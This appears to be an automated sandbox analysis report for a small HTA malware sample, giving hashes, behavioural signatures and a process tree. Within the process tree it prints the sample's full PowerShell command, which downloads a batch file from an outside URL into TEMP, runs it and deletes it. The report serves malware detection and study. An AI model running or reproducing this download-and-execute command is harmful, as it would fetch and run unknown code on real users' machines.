Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
11/01/2025, 11:42
Static task
static1
Behavioral task
behavioral1
Sample
c2.hta
Resource
win7-20240903-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
c2.hta
Resource
win10v2004-20241007-en
22 signatures
150 seconds
General
-
Target
c2.hta
-
Size
1KB
-
MD5
12f69df4d692549683858d447aba1d01
-
SHA1
6c4c5d5fcf1a1d9a52f049e18208888855203b29
-
SHA256
cec517b8225912ac87b826382db2260c6fc5337a4a6323c800b84e14bdaa4670
-
SHA512
21d914639be0a8c1914f9af752735ebcd5478ca9a39aaa84763477448e0a5f100ea38a73ba9c81b5e22fb8cd4e676bcc98cfc5b064b16deb1b4397829fe25525
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://candwfarmsllc.com/c2.bat
Signatures
-
pid Process 2544 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2544 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1968 wrote to memory of 2544 1968 mshta.exe 30 PID 1968 wrote to memory of 2544 1968 mshta.exe 30 PID 1968 wrote to memory of 2544 1968 mshta.exe 30 PID 1968 wrote to memory of 2544 1968 mshta.exe 30 PID 2544 wrote to memory of 2848 2544 powershell.exe 32 PID 2544 wrote to memory of 2848 2544 powershell.exe 32 PID 2544 wrote to memory of 2848 2544 powershell.exe 32 PID 2544 wrote to memory of 2848 2544 powershell.exe 32
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\c2.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$url = 'https://candwfarmsllc.com/c2.bat';$output = $env:TEMP + '\temp.bat';Invoke-WebRequest -Uri $url -OutFile $output;Start-Process 'cmd.exe' -ArgumentList '/c', $output -Wait;Remove-Item $output -Force;"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\temp.bat3⤵
- System Location Discovery: System Language Discovery
PID:2848
-
-